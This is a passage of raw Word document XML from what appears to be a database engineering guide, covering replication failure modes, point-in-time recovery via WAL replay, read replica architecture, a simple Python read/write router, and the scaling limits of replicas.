      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="3AC6E86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3A84D2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Primary crash (hardware failure)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0645C0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>0 data loss (replica has everything)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AED24E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Loss = uncommitted transactions in transit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="6DCBA7E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CEB119" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Network partition (primary isolated)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6D0BAF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Writes blocked (can't reach quorum)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661F4D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Primary continues alone, diverges from replicas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="476836F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F6694C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Datacenter failure (entire region)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324A9F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>0 loss if replica is cross-region sync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659094" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Loss = cross-region lag (100ms–seconds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="66B4645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105F5F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:lastRenderedPageBreak/>
              <w:t>Disk corruption (silent)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276C3F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Checksums detect; replica has correct copy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707139" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="10C4734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7B074C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Accidental DELETE/DROP TABLE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D3BB56" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Replicated to replicas immediately!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C6AC14" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Same — replication replicates MISTAKES too</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B882A83" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Replication does NOT protect against logical errors (accidental deletes, bugs). A DROP TABLE is faithfully replicated to all replicas. You need </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>point-in-time recovery (PITR)</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> from WAL/backups for this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D3BFC1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 Point-in-Time Recovery (PITR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037012A1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8750D9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Base backup taken at T=00:00 (full copy of database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B359509" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>WAL segments continuously archived (every change since backup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A34C04" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="50A815CF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Disaster at T=14:30: accidental DROP TABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5996AA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="16F5EA40" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732861B4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  1. Restore base backup (state at T=00:00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F392907" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  2. Replay WAL up to T=14:29:59 (just before the DROP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE7EE72" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  3. Database is restored to 1 second before the disaster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B383D3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Data loss: only changes in that 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD50B98" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="111A0372">
          <v:rect id="_x0000_i5650" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="172AAD2C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Read Scaling with Replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B423A7D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Read Replica Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAAE85" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895E760" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                    Writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA3D85" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476E3AB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008F47B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              ┌───────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0297F8F7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              │    Primary    │ ← All writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B36CCE3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              └───────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205ED9F0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                      │ Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DBA2E0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">          ┌───────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120471A6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88B3F6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    ┌──────────┐ ┌──────────┐ ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CC938" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    │ Replica 1│ │ Replica 2│ │ Replica 3│  ← Reads distributed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7055EA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    └──────────┘ └──────────┘ └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CD36A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="65676871" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Read capacity: 4x (primary + 3 replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E9636" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write capacity: 1x (still single primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F756351" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Read/Write Splitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05700221" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E6E73" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B0100B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>class DatabaseRouter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E641671" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    def __init__(self, primary, replicas):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BDB97A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        self.primary = primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398161A6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        self.replicas = replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338BFF89" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD709A2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    def get_connection(self, query_type):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00993DAF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        if query_type == 'write':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E00E09" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">            return self.primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87303B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C523F47" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">            # Round-robin across replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A528845" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            return random.choice(self.replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42941C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="0438D63C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t># Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F6A08" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>router = DatabaseRouter(primary_conn, [replica1, replica2, replica3])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A136B28" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>router.get_connection('read').execute("SELECT * FROM products WHERE ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7602A47C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>router.get_connection('write').execute("INSERT INTO orders ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6D29C6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy-level routing (transparent to application):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE86D2B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ProxySQL (MySQL):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Automatically routes SELECT to replicas, writes to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB0D51A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PgBouncer + read/write ports:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Different ports for read vs. write connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC0F0C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS RDS Proxy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Handles routing + connection pooling transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A3FF0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 Scaling Limits of Read Replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443A856" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Each replica added:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DD663" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Increases read capacity linearly (great!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C368A6E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Increases replication load on primary (must stream WAL to one more replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4369582E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Consumes network bandwidth (WAL streaming to each replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68BBB8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Practical limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF667F9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF8509" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>PostgreSQL: typically 5–10 read replicas per primary (WAL streaming overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F9258" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>MySQL: similar, though cascading replicas help (primary → intermediate → leaf replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE1F58" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cascading replication (for many replicas):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C569F5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7EA090" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Replica A → Replica B → Replica C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E295DF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Replica D → Replica E → Replica F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C5285" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="76168F3B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary only streams to 2 intermediate replicas (not 6).</w:t>
      </w:r>
    </w:p>
